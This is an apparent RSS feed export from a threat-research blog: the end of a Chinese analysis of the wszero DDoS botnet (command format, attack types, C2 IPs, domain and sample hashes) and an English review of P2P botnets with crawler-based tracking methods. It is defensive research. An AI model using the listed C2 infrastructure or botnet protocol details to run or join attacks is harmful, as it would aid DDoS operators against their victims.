<h4 id>&#x5E95;&#x5C42;&#x4F20;&#x8F93;&#x534F;&#x8BAE;&#x7684;&#x53D8;&#x5316;</h4>
<p>V1&#x7248;&#x672C;&#x91C7;&#x7528;&#x4E86;TCP&#xFF0C;V2&#x548C;V4&#x57FA;&#x4E8E;WEBSOCKET&#xFF0C;V3&#x540C;&#x6837;&#x57FA;&#x4E8E;WEBSOCKET&#xFF0C;&#x4F46;&#x5F3A;&#x5236;&#x4F7F;&#x7528;TLS&#x5BF9;WEBSOCKET&#x8FDB;&#x884C;&#x4FDD;&#x62A4;&#x3002;</p>
<p>&#x4EE5;V2&#x4E3A;&#x4F8B;&#xFF0C;BOT&#x548C;C2&#x9996;&#x5148;&#x8FDB;&#x884C;&#x5EFA;&#x7ACB;ws&#x8FDE;&#x63A5;&#xFF0C;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/11/wszero_v2pkg.png"><img src="https://blog.netlab.360.com/content/images/2022/11/wszero_v2pkg.png" class="kg-image"></a></p>
<p>&#x63A5;&#x7740;&#x518D;&#x53D1;&#x9001;BotInfo&#xFF0C;&#x5185;&#x5BB9;&#x683C;&#x5F0F;&#x4F9D;&#x7136;&#x4E3A;JSON&#x4E32;&#x3002;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/11/wszero_v2payload.png"><img src="https://blog.netlab.360.com/content/images/2022/11/wszero_v2payload.png" class="kg-image"></a></p>
<h4 id>&#x6307;&#x4EE4;</h4>
<p>&#x5F53;Bot&#x6CE8;&#x518C;&#x6210;&#x529F;&#x540E;&#xFF0C;&#x5C31;&#x5F00;&#x59CB;&#x7B49;&#x5F85;&#x5E76;&#x6267;&#x884C;C2&#x4E0B;&#x53D1;&#x7684;&#x6307;&#x4EE4;&#x3002;&#x6307;&#x4EE4;&#x6D88;&#x606F;&#x540C;&#x6837;&#x662F;JSON&#x683C;&#x5F0F;&#xFF0C;&#x6709;<strong>Type&#xFF0C; Data&#xFF0C;Command</strong> 3 &#x4E2A;key&#xFF0C;&#x5176;&#x4E2D;<strong>Type</strong>&#x7528;&#x4E8E;&#x6307;&#x5B9A;DDoS&#x6216;Command&#x4EFB;&#x52A1;&#x7C7B;&#x522B;&#xFF0C;<strong>Data</strong>/<strong>Command</strong>&#x5219;&#x5206;&#x522B;&#x7528;&#x4E8E;&#x5B58;&#x50A8;DDoS&#x9009;&#x9879;&#xFF0C;&#x7CFB;&#x7EDF;&#x547D;&#x4EE4;&#x53CA;&#x53C2;&#x6570;&#x3002;&#x76F8;&#x5173;&#x89E3;&#x6790;&#x4EE3;&#x7801;&#x5982;&#x4E0B;&#x3002;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/11/wszero_cmdfmt.png"><img src="https://blog.netlab.360.com/content/images/2022/11/wszero_cmdfmt.png" class="kg-image"></a></p>
<p>&#x4E0B;&#x9762;&#x662F;&#x6211;&#x4EEC;&#x5B9E;&#x9645;&#x63A5;&#x6536;&#x5230;&#x7684;HTTP_BYPASS&#x653B;&#x51FB;&#x6307;&#x4EE4;&#xFF0C;&#x5F53;Bot&#x63A5;&#x6536;&#x5230;&#x8FD9;&#x4E2A;&#x6307;&#x4EE4;&#x540E;&#x5C31;&#x4F1A;&#x4F7F;&#x7528;&#x8BE5;&#x65B9;&#x6CD5;&#x5BF9;&#x76EE;&#x6807;&#x8FDB;&#x884C;&#x653B;&#x51FB;&#x3002;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/11/wszero_ddos.png"><img src="https://blog.netlab.360.com/content/images/2022/11/wszero_ddos.png" class="kg-image"></a></p>
<p>&#x9664;&#x4E86;HTTP_BYPASS, wszero&#x8FD8;&#x652F;&#x6301;TCP/UDP/ICMP&#x7B49;&#x591A;&#x79CD;&#x534F;&#x8BAE;&#x7684;&#x653B;&#x51FB;&#x65B9;&#x6CD5;&#xFF0C;&#x5B8C;&#x6574;&#x5217;&#x8868;&#x8BE6;&#x89C1;&#x4E0B;&#x56FE;&#x3002;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/11/wszero_atkvec.png"><img src="https://blog.netlab.360.com/content/images/2022/11/wszero_atkvec.png" class="kg-image"></a></p>
<h2 id>&#x6307;&#x4EE4;&#x8DDF;&#x8E2A;&#x60C5;&#x51B5;</h2>
<p>&#x5206;&#x6790;&#x51FA;&#x8FD9;&#x4E2A;&#x65B0;&#x5BB6;&#x65CF;&#x540E;&#xFF0C;&#x6211;&#x4EEC;&#x8FC5;&#x901F;&#x505A;&#x4E86;&#x8DDF;&#x8E2A;&#x5904;&#x7406;&#xFF0C;&#x5728;2022&#x5E74;11&#x6708;23&#x65E5;&#x9996;&#x6B21;&#x63A5;&#x6536;&#x5230;DDoS&#x653B;&#x51FB;&#x6307;&#x4EE4;&#xFF0C;&#x5177;&#x4F53;DDoS&#x653B;&#x51FB;&#x8D8B;&#x52BF;&#x5982;&#x4E0B;&#x56FE;&#x6240;&#x793A;&#xFF1A;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/Snip20221202_33.png"><img src="https://blog.netlab.360.com/content/images/2022/12/Snip20221202_33.min.png" class="kg-image"></a></p>
<p>&#x80FD;&#x770B;&#x51FA;&#x6765;&#x5176;&#x653B;&#x51FB;&#x6307;&#x4EE4;&#x7684;&#x4E0B;&#x53D1;&#x5E76;&#x4E0D;&#x662F;&#x5F88;&#x9891;&#x7E41;&#xFF0C;&#x8FD9;&#x53EF;&#x80FD;&#x8DDF;&#x8FD9;&#x4E2A;&#x5BB6;&#x65CF;&#x8FD8;&#x5904;&#x4E8E;&#x65E9;&#x671F;&#x53D1;&#x5C55;&#x9636;&#x6BB5;&#x6709;&#x5173;&#x3002;&#x76EE;&#x524D;&#x5176;C2&#x4ECD;&#x5728;&#x6D3B;&#x8DC3;&#xFF0C;&#x5E76;&#x4E14;&#x9891;&#x7E41;&#x4E0B;&#x53D1;&#x66F4;&#x65B0;&#x6307;&#x4EE4;&#x3002;</p>
<h2 id>&#x7ED3;&#x5C3E;</h2>
<p>&#x4ECA;&#x5E74;&#x6211;&#x4EEC;&#x5DF2;&#x7ECF;&#x89C2;&#x5BDF;&#x5230;&#x591A;&#x8D77;&#x4F7F;&#x7528;Go&#x5F00;&#x53D1;&#x7684;&#x5168;&#x65B0;botnet&#x5BB6;&#x65CF;&#xFF0C;wszero&#x53EA;&#x662F;&#x5176;&#x4E2D;&#x4E4B;&#x4E00;&#x3002;&#x5176;&#x4F5C;&#x8005;&#x5728;10&#x591A;&#x5929;&#x7684;&#x65F6;&#x95F4;&#x5185;&#x505A;&#x4E86;4&#x6B21;&#x5927;&#x7684;&#x5347;&#x7EA7;&#xFF0C;&#x8BF4;&#x660E;&#x8BE5;&#x5BB6;&#x65CF;&#x8FD8;&#x5728;&#x53D1;&#x5C55;&#x4E4B;&#x4E2D;&#xFF0C;&#x672A;&#x6765;&#x53EF;&#x80FD;&#x4F1A;&#x7EE7;&#x7EED;&#x63A8;&#x51FA;&#x65B0;&#x7684;&#x7248;&#x672C;&#x3002;&#x5BF9;&#x6B64;&#x6211;&#x4EEC;&#x4F1A;&#x6301;&#x7EED;&#x5173;&#x6CE8;&#xFF0C;&#x6709;&#x65B0;&#x7684;&#x53D1;&#x73B0;&#x5C06;&#x4F1A;&#x53CA;&#x65F6;&#x516C;&#x5F00;&#x3002;</p>
<h2 id>&#x8054;&#x7CFB;&#x6211;&#x4EEC;</h2>
<p>&#x611F;&#x5174;&#x8DA3;&#x7684;&#x8BFB;&#x8005;&#xFF0C;&#x53EF;&#x4EE5;&#x5728; <a href="https://twitter.com/360Netlab?ref=blog.netlab.360.com">twitter</a> &#x6216;&#x8005;&#x901A;&#x8FC7;&#x90AE;&#x4EF6;netlab[at]360.cn&#x8054;&#x7CFB;&#x6211;&#x4EEC;&#x3002;</p>
<h2 id>&#x89E3;&#x51B3;&#x65B9;&#x6848;</h2>
<p>&#x57FA;&#x4E8E;Netlab&#x591A;&#x5E74;&#x7814;&#x7A76;&#x5DE5;&#x4F5C;&#x5B75;&#x5316;&#x7684;360&#x5168;&#x7CFB;&#x5217;<a href="https://sdns.360.net/?ref=blog.netlab.360.com">DNS&#x5B89;&#x5168;&#x4EA7;&#x54C1;</a>&#x5747;&#x5DF2;&#x652F;&#x6301;&#x6587;&#x4E2D;&#x8FDC;&#x63A7;&#x670D;&#x52A1;&#x5668;&#x7684;&#x62E6;&#x622A;&#x548C;&#x68C0;&#x6D4B;&#xFF0C;&#x540C;&#x65F6;&#x5185;&#x7F6E;&#x591A;&#x79CD;&#x7B97;&#x6CD5;&#x53EF;&#x6709;&#x6548;&#x53D1;&#x73B0;&#x548C;&#x62E6;&#x622A;&#x5404;&#x79CD;&#x672A;&#x77E5;&#x5A01;&#x80C1;&#xFF0C;&#x5EFA;&#x8BAE;&#x4F01;&#x4E1A;&#x5BA2;&#x6237;&#x63A5;&#x5165;360 DNS&#x5B89;&#x5168;SaaS&#x5E73;&#x53F0;&#x6216;&#x90E8;&#x7F72;&#x672C;&#x5730;360DNS&#x5B89;&#x5168;&#x4EA7;&#x54C1;&#xFF0C;&#x53CA;&#x65F6;&#x9632;&#x8303;&#x6B64;&#x7C7B;&#x65B0;&#x578B;&#x5A01;&#x80C1;&#xFF0C;&#x907F;&#x514D;&#x4F01;&#x4E1A;&#x8D44;&#x4EA7;&#x5931;&#x9677;&#x3002;&#x8054;&#x7CFB;&#x4EBA;: <a href="mailto:wangkun-bd@360.cn">wangkun-bd@360.cn</a></p>
<h2 id="ioc">IoC</h2>
<h3 id="c2">C2</h3>
<pre><code>176.65.137.5
zero.sudolite.ml
</code></pre>
<h3 id="loaderip">Loader IP</h3>
<pre><code>176.65.137.6
176.65.137.5
</code></pre>
<h3 id="sample">Sample</h3>
<pre><code>aabca688b31eb962a7a2849c57000bea
86827dc70c5001633b801b7b7fa8a9b9
0642bc041c2e4a74fbf58537a2305543
13e1966f13274c71d39e4aea7f62127e
271aebe152b793765a75e5e89d24cdbd
27f66ef808e5497528c653ba862822b7
2eca5324301a55dfa5b5d2c2b67ab9d0
342a5c7e1eb3ead0b6ddeeed4f1a811f
3627e6848eb9f6a28c7c83b347753f26
367b9095e93d27fc1a684a90a77e82f9
40b3bb4e7d00377cbd9d100b39d26ac0
45bc7cd7c7acdf679d1f3ceceb7d6602
4a5e9ffd3ce77d5269033b8032426e45
513a8036ca358b0acfce30903f95f12b
52d21fbad081d699ec6e041fcdd6133c
59d635cca6de9c417995ab5fa5501829
5eea56fc1f7a373973dc9ff0cc8fe86f
62c11ea75e82611b6ba7d7bf08ed009f
62eeda48db5d0f5c6ee31112fe0c18ee
6b6cac5bd765178545b0fa3caa0fd99b
72ad17b874a956fdb4c969a03924aea2
777a4bdda609735b1dd784b98fe27693
79a7fc0ae8222f29e9c6e133f7a33b4b
823c7b89db6a35345f205bb64769d5ef
83d647c9749e9a5a5f9c6ae01747a713
857dfb390d02f5ca93a37ffa2f0cbde2
871624995190fe3310f553f0fbc61b0e
88b98664c3c901242c73e1d8f18a47eb
8d85e3e0328cdd51c83fb68e31a28e62
8e2efc8f7edd7dfff4bad7126d30e254
8f55245e24c4e84df7e8dddd19523d93
9039df359128850de1b3ee1240b150d6
9606e8903df98f59a827be8876ace389
9d396b48773ccbc5fdb3ffc2fb7c20f6
9daae12c05a9a21c405c9319fc49c358
ae504e3f08e2fef8e95100811fe8e2be
b36b340ba9947dae7b5bab3e1330d53a
b7c841eb41d6233ff67006177a507c66
bbfefb41c71896f7433b58376218553d
bef01d6529c5250de0662547d75959b2
c5e6aae51d97acb44339ae4d5f296b4f
c8cfc2ddb08f812f6440b8918a916c75
d418109e5d81d48da12fe271cd08c61a
da86780f3a94c1aa6ea76fdfcb5db412
de28becdcbc5400261a809420c5953e3
ec0d832b564606660645e15f3b28fceb
f635dfefc35ad532d2ad9a08cb4864bd
f7cde1a55211f815bc3a6aecd04f731b
fcbb9872ea0fe1af63254b65c4475ee8
fe8e1f4680355b1093536165e445fa8e
</code></pre>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[P2P Botnets: Review - Status - Continuous Monitoring]]></title><description><![CDATA[<h1 id="origins">Origins</h1>
<p>P2P networks are more scalable and robust than traditional C/S structures, and these advantages were recognized by the botnet authors early on and used in their botnets. In terms of time, <a href="https://en.wikipedia.org/wiki/Storm_botnet?ref=blog.netlab.360.com">Storm</a>, which appeared in 2007, can be considered the progenitor of this area, when botnet threats were</p>]]></description><link>https://blog.netlab.360.com/p2p-botnets-review-status-continuous-monitoring/</link><guid isPermaLink="false">63873b9a8b1c1e0007f53025</guid><category><![CDATA[Import 2022-11-30 11:16]]></category><category><![CDATA[en]]></category><dc:creator><![CDATA[360Netlab]]></dc:creator><pubDate>Thu, 03 Nov 2022 14:00:00 GMT</pubDate><content:encoded><![CDATA[<h1 id="origins">Origins</h1>
<p>P2P networks are more scalable and robust than traditional C/S structures, and these advantages were recognized by the botnet authors early on and used in their botnets. In terms of time, <a href="https://en.wikipedia.org/wiki/Storm_botnet?ref=blog.netlab.360.com">Storm</a>, which appeared in 2007, can be considered the progenitor of this area, when botnet threats were first known to the public. after Storm, there have been Karen, <a href="https://ijcttjournal.org/archives/ijctt-v12p112?ref=blog.netlab.360.com">ZeroAccess</a>, GameOver, Hijime, mozi and other kinds of P2P botnes, P2P botnets come and go, and some, for example, Mozi keep on going even though the author had been  caught.</p>
<p>The early P2P botnets mainly targeted Windows machines, such as Storm, ZeroAccess and GameOver, which were infected with the Windows operating system. after Mirai appeared in 2016, Linux IoT devices, which exist in large numbers on the network and lack some basic security defense, started to become the target of many botnets. For example, Hijime, mozi, pink all target Linux devices.</p>
<p>Because of the &quot;centerless&quot; nature of P2P networks, it is somewhat difficult to assess their size using traditional means. To try to solve this problem, security researchers have invented P2P crawler technology, which can track a P2P botnet and obtain node IPs, download links and configuration information for scale assessment and targeted removal.</p>
<p>Our team(360 netlab) has been focusing on discovering and tracking active botnets for a long time, and P2P botnets are surely on our radar. For example, we first disclosed the mozi botnet in 2019. In order to gain better visibility, we built an industrial-level tracking system for P2P botnets, with the goal of covering major active P2P botnets, This blog article will briefly analyze the current status of the following 5 families based on the tracking data generated by this system.</p>
<p>(In addition to the 5 families mentioned in this article, readers are also welcomed to leave comments below about new|active families of interest, and we will look into them accordingly)</p>
<h1 id="overview-of-tracking-strategy">Overview of tracking Strategy</h1>
<p>This section will briefly introduce the main tracking strategies used in our tracking system.</p>
<h2 id="tracking-goals">Tracking Goals</h2>
<p>The main goal of the system is to record the IPs of all the p2p nodes, we &#x201C;create&#x201D; a node by simulating the communication protocol, so it can join the corresponding P2P network to participate in the data message exchange. Every time a message exchange is successfully completed, the IP of the other party is recorded, this goes on and on and finally the majority of the nodes from the target P2P network would be recorded.</p>
<h2 id="methods">Methods</h2>
<p>The protocol design of each P2P family varies, but following are some common strategies, normally at least one of these would be selected as the tracking method.</p>
<p><strong>Active Probe</strong>: This strategy is somewhat similar to a public network scanner in terms of working principle. It first feeds probe messages to the target node, then parses the received reply messages, and identifies the peer as a peer node when the returned message format matches the family characteristics. In practice, we will first delineate a probe range and then probe the nodes within this range (where the probe range may consist of a suspicious network segment or suspicious nodes generated from other policies).</p>
<p><strong>Recent communications</strong>&#xFF1A;Common P2P families maintain a &quot;recent communications list&quot; of recent peers in each node&apos;s memory. In some families, this list is also available to other nodes via specific commands, and would commonly be used as a seed list when the node &#x201C;boots up&#x201D;, so that they can quickly join the P2P network. In this case, we can discover more peer nodes by traversing this &quot;recent communication list&quot;.</p>
<p><strong>Node heartbeat</strong>: When a node maintains a &quot;recent communication list&quot;, it will send heartbeat messages to the nodes on the list periodically to declare its online status. Based on this, we can add the &quot;fake node&quot; to the other node&apos;s active list to get the active status of the corresponding node at any time. In some cases, we also send heartbeat messages to ensure that we don&#x2019;t get kicked out by the network.</p>
<p><strong>Wait and see</strong>: &quot;Hajime&quot; and &quot;Mozi&quot;, for example, use &quot;<a href="https://en.bitcoinwiki.org/wiki/Kademlia?ref=blog.netlab.360.com">Distributed Hash Table</a>&quot; to implement their P2P network structure. This technique is designed to speed up data lookup by adding a rule of information-to-node distance and prioritizing the information to be stored on those nodes that are closer. Based on this rule, we can forge a &#x201C;we-are-more-closer&#x201D; node then wait for the arrival of other nodes. When other nodes try to obtain the information of the corresponding family from the forged node, we can directly record the other IP as the tracking result.</p>
<h1 id="how-to-read-the-data">How to read the Data</h1>
<h2 id="tracking-family-selection-basis">Tracking family selection basis</h2>
<p>We consider the following two dimensions to screen the appropriate families for tracking to ensure the relative objectivity of the final results.</p>
<p><strong>Based on size</strong>: When selecting families, the most priority indicator is that the size of the botnet has to be large, or once historically large enough, in this case &quot;Hajime&quot;/&quot;Mozi&quot;/ &#x201C;pink&quot; all stand out.</p>
<p><strong>Recent Disclosures</strong>: The next choice is the newly emerged ones that have been active at lease for a little while, based on this, we have chosen &quot;panchan&quot; and &quot;frizefrog&quot; as they are newly discovered this year.</p>
<h2 id="size-of-the-infected-bot-nodes">Size of the infected bot nodes</h2>
<p>Depending on the type of the host device, the number of bot IPs does not necessarily reflect the true number of infected devices.</p>
<p><em>Bots are servers</em>: In order to provide stable services, the public IPs of servers usually do not change, so the numbers are more accurate.</p>
<p><em>Bots are IoT devices</em>: These devices are usually found in the residential network. We all know that the IP addresses of residents devices change frequently. This can lead to a large uncertainty in the mapping relationship between the public IP and the device. Multiple devices might share a common public IP (NAT scenario), and devices can switch to different IPs multiple times within a time window (dial-up Internet scenario).</p>
<h1 id="daily-activity-of-each-family">Daily activity of each family</h1>
<p>As a comparison, if we take the daily activity of each Monday since August as a sample to plot the medium- and long-term tracking graph, the following is shown.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/10/P2P_080910_HMP.png" alt="P2P_080910_HMP" loading="lazy"></p>
<p><img src="https://blog.netlab.360.com/content/images/2022/10/P2P_080910_Fri_Panchan.png" alt="P2P_080910_Fri_Panchan" loading="lazy"></p>
<p>We can clearly see the order of the family size:</p>
<p>Pink &gt; Hajime &gt; Mozi &gt;&gt; FritzFrog &lt;&gt; Panchan</p>
<p>We can see that the daily activity data of each family has not changed much over the three months period (see the discussion below for Pink&apos;s fluctuations in August)</p>
<h1 id="statistics-by-family">Statistics by family</h1>
<h2 id="pink">Pink</h2>
<p>At one point, the Pink family had infected more than one million devices in China, it has some cleverly designed command and control protocols. For time sensitive instructions, the control commands are pushed to the bots through a centralized mechanism, On the other hand, if the instructions are not urgent, P2P would be used. For more information, please refer to our previous report.</p>
<p>&#x300A;<a href="https://blog.netlab.360.com/pink-en/">Pink, a botnet that competed with the vendor to control the massive infected devices</a>&#x300B;</p>
<p><strong>Geographical distribution</strong></p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/pink_world_map.png" alt="pink_world_map" loading="lazy"></p>
<p>As shown in the figure, Pink&apos;s scope of influence is mainly domestic IoT devices, and the following is its distribution in China.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/pink_china_map.png" alt="pink_china_map" loading="lazy"></p>
<p><strong>Daily activity fluctuation</strong></p>
<p>It is worth mentioning in particular that the daily activity data of the family has fluctuated greatly since July, first dropping by an order of magnitude in a week starting on July 12, reaching a daily activity of about 20,000, then returning to zero for about 10 days after August 20, and then returning to 20,000 in September. The fluctuation of daily activity can be seen in the following chart.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/09/pink_tracker-1.png" alt="pink_tracker-1" loading="lazy"></p>
<p>Now let&#x2019;s take a look at daily activity data of July 12, July 26 and September 1.  It is easy to tell that the number of daily activities in most provinces decreased significantly with time goes by.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/09/pink_0712_china_map.png" alt="pink_0712_china_map" loading="lazy"></p>
<p><img src="https://blog.netlab.360.com/content/images/2022/09/pink_2022_07_26.png" alt="pink_2022_07_26" loading="lazy"></p>
<p><img src="https://blog.netlab.360.com/content/images/2022/09/pink_2022_09_01.png" alt="pink_2022_09_01" loading="lazy"></p>
<p>So, it is very likely that starting from July, the major device vendor carried out a national wide clean up effort, resulting in a significant decrease in the number of infected devices.</p>
<p>The fluctuations in late August, on the other hand, are likely due to a national wide C2 blocking action in place.</p>
<h2 id="hajime">Hajime</h2>
<p>Hajime, which emerged in the same year as MIRAI, less than a few months apart, has been claimed to be run by &quot;white hats&quot; in its alert messages, and its components function with the primary goal of self-propagation. The communication and management between its components makes extensive use of asymmetric encryption and decryption algorithms, making it an extremely classic P2P botnet family. We have covered this botnet in our previous blog.</p>
<p>&#x300A;<a href="https://blog.netlab.360.com/hajime-status-report/">Is Hajime botnet dead?</a>&#x300B;</p>
<p><strong>Geographical distribution</strong></p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/hajime_world_map.png" alt="hajime_world_map" loading="lazy"></p>
<p><strong>Iran tops the list</strong></p>
<p>We normally don&#x2019;t see Iran on our security event list, but with Hajime infection, Iran is leading the pack, which is pretty interesting. Please leave comments below if you have more insights.</p>
<p><strong>CPU distribution in Hajime</strong></p>
<p>Hajime is a P2P network built on file exchanging and each Hajime bot tries to find the latest version of .i.xxx and atk.xxx files (e.g. atk.arm7/.i.arm7) when it runs. This gives us an opportunity to evaluate the CPU distribution in the &quot;Hajime network&quot;. When the Hajime node asks us which nodes contain the corresponding files, we gets a DHT.search count. When a Hajime node asks us to download the corresponding file, we gets a uTP.Request count. Putting these two types of files and two types of counts together, we would have the following four pie charts:</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/hajime_cpu_count-2.png" alt="hajime_cpu_count-2" loading="lazy"></p>
<p>Based on the above pie charts, we can see that MIPS based bots are the majority in the Hajime network, far exceeding the sum of the other types of hosts, while MIPSEL has the fewest host nodes.</p>
<p>If we consider that Hajime had integrated a large number of vulnerabilities for propagation, this data can even reflect to some extent the distribution of each type of CPU in smart devices.</p>
<h2 id="mozi">Mozi</h2>
<p>Mozi started out as a P2P family performing DDoS attacks for profits, and later added a mining component. Its network topology is built on the basis of the DHT protocol. More information can be found in our previously published reports.</p>
<p>&#x300A;<a href="https://blog.netlab.360.com/mozi-another-botnet-using-dht/">Mozi, Another Botnet Using DHT</a>&#x300B;</p>
<p>&#x300A;<a href="https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/">The Mostly Dead Mozi and Its&#x2019; Lingering Bots</a>&#x300B;</p>
<p><strong>Geographical Distribution</strong></p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/mozi_world_map.png" alt="mozi_world_map" loading="lazy"></p>
<h2 id="fritzfrog">FritzFrog</h2>
<p>FritzFrog is a mining P2P family which relies on SSH services to build P2P networks. It was first disclosed by akamai. More details can be found in the following report (interestingly, FritzFrog wallet address is related to Mozi).</p>
<p>&#x300A;<a href="https://www.akamai.com/blog/security/fritzfrog-p2p?ref=blog.netlab.360.com">FritzFrog: P2P Botnet Hops Back on the Scene</a>&#x300B;</p>
<p><strong>Geographical Distribution</strong></p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/fritzfrog_world_map.png" alt="fritzfrog_world_map" loading="lazy"></p>
<p><strong>Account Passwords in FritzFrog</strong></p>
<p>Since FritzFrog&apos;s P2P is based on SSH implementation, the password of the infected nodes are reflected in the crawled data, the following are the top passwords.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/10/fritzfrog_user_pass.png" alt="fritzfrog_user_pass" loading="lazy"></p>
<p>The No.1 weak password starts with <code>1</code>, can anyone take a guess what it is?</p>
<h2 id="panchan">Panchan</h2>
<p>Panchan is a mining P2P botnet developed in Go language, it also uses SSH weak passwords for propagation. Its code contains a lot of Japanese katakana, which suggests that Panchan&apos;s developers are fluent in Japanese. Another interesting point is that it implements an interactive console on the listening port, using the idea of protocol reuse, allowing administrators to perform some simple queries and management of the nodes from the network. More detailed information can be found in the following Akamai report.</p>
<p>&#x300A;<a href="https://www.akamai.com/blog/security/new-p2p-botnet-panchan?ref=blog.netlab.360.com">Panchan&#x2019;s Mining Rig: New Golang Peer-to-Peer Botnet Says &#x201C;Hi!&#x201D;</a>&#x300B;</p>
<p><strong>Geographic Distribution</strong></p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/panchan_world_map-1.png" alt="panchan_world_map-1" loading="lazy"></p>
<h1 id="conclusion">Conclusion</h1>
<p>Normally we end our blog with some conclusion, do we have one here? Not really, we just want to shout out to our readers again: if you have seen some interesting p2p botnet, leave a comment, shoot us an email(<strong>netlab[at]360.cn</strong>) or on  <a href="https://twitter.com/360Netlab?ref=blog.netlab.360.com"><strong>twitter</strong></a>.</p>
]]></content:encoded></item><item><title><![CDATA[P2P 僵尸网络：回顾·现状·持续监测]]></title><description><![CDATA[<!--kg-card-begin: markdown--><h1 id>&#x7F18;&#x8D77;</h1>
<p>P2P&#x7ED3;&#x6784;&#x7684;&#x7F51;&#x7EDC;&#x6BD4;&#x4F20;&#x7EDF;&#x7684;C/S&#x7ED3;&#x6784;&#x5177;&#x6709;&#x66F4;&#x597D;&#x7684;&#x53EF;&#x6269;&#x5C55;&#x6027;&#x548C;&#x5065;&#x58EE;&#x6027;&#xFF0C;&#x8FD9;&#x4E9B;&#x4F18;&#x70B9;&#x5F88;&#x65E9;&#x5C31;&#x4E3A;botnet&#x7684;&#x4F5C;&#x8005;&#x6240;&#x8BA4;&#x8BC6;&#x5230;&#x5E76;&#x88AB;&#x7528;&#x5230;</p>]]></description><link>https://blog.netlab.360.com/p2p-botnet-monitor/</link><guid isPermaLink="false">63873b9a8b1c1e0007f53020</guid><category><![CDATA[Import 2022-11-30 11:16]]></category><dc:creator><![CDATA[360Netlab]]></dc:creator><pubDate>Wed, 02 Nov 2022 03:11:33 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><h1 id>&#x7F18;&#x8D77;</h1>
<p>P2P&#x7ED3;&#x6784;&#x7684;&#x7F51;&#x7EDC;&#x6BD4;&#x4F20;&#x7EDF;&#x7684;C/S&#x7ED3;&#x6784;&#x5177;&#x6709;&#x66F4;&#x597D;&#x7684;&#x53EF;&#x6269;&#x5C55;&#x6027;&#x548C;&#x5065;&#x58EE;&#x6027;&#xFF0C;&#x8FD9;&#x4E9B;&#x4F18;&#x70B9;&#x5F88;&#x65E9;&#x5C31;&#x4E3A;botnet&#x7684;&#x4F5C;&#x8005;&#x6240;&#x8BA4;&#x8BC6;&#x5230;&#x5E76;&#x88AB;&#x7528;&#x5230;&#x4ED6;&#x4EEC;&#x7684;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x4E2D;&#x3002;&#x4ECE;&#x65F6;&#x95F4;&#x4E0A;&#x770B;&#xFF0C;2007&#x5E74;&#x51FA;&#x73B0;&#x7684;<a href="https://en.wikipedia.org/wiki/Storm_botnet?ref=blog.netlab.360.com">Storm</a>&#x53EF;&#x4EE5;&#x7B97;&#x662F;&#x8FD9;&#x65B9;&#x9762;&#x7684;&#x9F3B;&#x7956;&#xFF0C;&#x90A3;&#x65F6;botnet&#x8FD9;&#x79CD;&#x7F51;&#x7EDC;&#x5A01;&#x80C1;&#x521A;&#x4E3A;&#x5927;&#x4F17;&#x6240;&#x77E5;&#x3002;Storm&#x4E4B;&#x540E;&#xFF0C;&#x9646;&#x7EED;&#x53C8;&#x6709;Karen&#x3001;<a href="https://ijcttjournal.org/archives/ijctt-v12p112?ref=blog.netlab.360.com">ZeroAccess</a>&#x3001;GameOver&#x3001;Hijime&#x3001;mozi&#x7B49;20&#x6765;&#x79CD;P2P botnet&#x5148;&#x540E;&#x51FA;&#x73B0;&#xFF0C;&#x5B83;&#x4EEC;&#x5728;&#x6280;&#x672F;&#x4E0A;&#x5404;&#x6709;&#x7279;&#x70B9;&#xFF0C;&#x5171;&#x540C;&#x70B9;&#x5C31;&#x662F;&#x89C4;&#x6A21;&#x5927;&#x3001;&#x9632;&#x5FA1;&#x96BE;&#x5EA6;&#x5927;&#xFF0C;&#x60F3;&#x8BA9;&#x5B83;&#x4EEC;&#x5F7B;&#x5E95;&#x6D88;&#x5931;&#x6BD4;&#x8F83;&#x56F0;&#x96BE;&#xFF0C;&#x6BD4;&#x5982;Mozi&#x5728;&#x4F5C;&#x8005;&#x5DF2;&#x7ECF;&#x660E;&#x786E;&#x653E;&#x5F03;&#x751A;&#x81F3;&#x88AB;&#x6293;&#x51E0;&#x5E74;&#x4E4B;&#x540E;&#x8FD8;&#x5728;&#x6D3B;&#x8DC3;&#xFF0C;&#x53EF;&#x8C13;&#x201C;&#x767E;&#x8DB3;&#x4E4B;&#x866B;&#x6B7B;&#x800C;&#x4E0D;&#x50F5;&#x201D;&#x3002;</p>
<p>&#x65E9;&#x671F;&#x7684;P2P botnet&#x4E3B;&#x8981;&#x9488;&#x5BF9;Windows&#x673A;&#x5668;&#xFF0C;&#x6BD4;&#x5982;Storm&#x3001;ZeroAccess&#x4EE5;&#x53CA;GameOver&#x611F;&#x67D3;&#x7684;&#x90FD;&#x662F;Windows&#x64CD;&#x4F5C;&#x7CFB;&#x7EDF;&#x3002;2016&#x5E74;Mirai&#x51FA;&#x73B0;&#x4E4B;&#x540E;&#xFF0C;&#x7F51;&#x7EDC;&#x4E0A;&#x90A3;&#x4E9B;&#x5927;&#x91CF;&#x5B58;&#x5728;&#x800C;&#x53C8;&#x7F3A;&#x4E4F;&#x9632;&#x5FA1;&#x7684;Linux IoT&#x8BBE;&#x5907;&#x5F00;&#x59CB;&#x6210;&#x4E3A;&#x8BB8;&#x591A;botnet&#x7684;&#x76EE;&#x6807;&#xFF0C;Hijime&#x3001;mozi&#x3001;pink&#x7B49;&#x9488;&#x5BF9;Linux&#x8BBE;&#x5907;&#x7684;P2P botnet&#x9646;&#x7EED;&#x51FA;&#x73B0;&#x3002;</p>
